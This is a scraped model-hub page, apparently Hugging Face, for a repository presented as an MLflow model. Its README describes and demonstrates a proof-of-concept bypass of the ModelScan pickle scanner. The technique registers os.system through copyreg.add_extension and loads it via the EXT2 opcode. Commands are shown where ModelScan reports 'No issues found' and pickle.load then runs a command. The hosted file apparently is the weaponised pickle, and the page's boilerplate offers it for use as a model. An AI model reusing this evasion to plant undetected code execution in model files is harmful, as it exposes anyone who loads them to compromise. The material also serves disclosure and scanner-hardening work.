Downloads · 30 days
0
xiaoyaoes/modelscan-ext2-extension-bypass
modelscan-ext2-extension-bypass is a machine learning model from xiaoyaoes. Use it for the machine learning task on the model card, and read the license before you ship it in a product. It is set up for mlflow.
ModelScan's pickle scanner only inspects GLOBAL, INST, and STACKGLOBAL opcodes to detect dangerous module/function references. It completely ignores EXT1, EXT2, and EXT4 opcodes.
Downloads · 30 days
0
Access
Public
Updated Jun 12, 2026
Repo size
76 B
Likes
0
Public
Click a slice to open those files.
Other1.8 KB · 48%
From the Hugging Face model README
ModelScan's pickle scanner only inspects GLOBAL, INST, and STACK_GLOBAL opcodes to detect dangerous module/function references. It completely ignores EXT1, EXT2, and EXT4 opcodes.
This MLflow model uses copyreg.add_extension() to register os.system in pickle's extension registry, then loads it via the EXT2 opcode — which ModelScan never examines. The result: arbitrary OS command execution with zero detection.
copyreg.add_extension('os', 'system', 31337) registers os.system under external code 31337EXT2 31337 opcode loads os.system from the registry — invisible to ModelScanos.system('cmd') — command executedModelScan analyzes only three opcode types:
GLOBAL → module\nname\nINST → module\nname\nSTACK_GLOBAL → walks backwards for string operandsEXT1, EXT2, and EXT4 opcodes are completely absent from the scanner code. The dangerous os.system reference is loaded through the extension registry and never appears as a module/name pair in the opcode stream.
# ModelScan says CLEAN
modelscan -p model.pkl
# Output: No issues found! 🎉
# pickle.load() triggers RCE
python3 -c "
import pickle
with open('model.pkl', 'rb') as f:
pickle.load(f)
"
# Output: EXT2_PWNED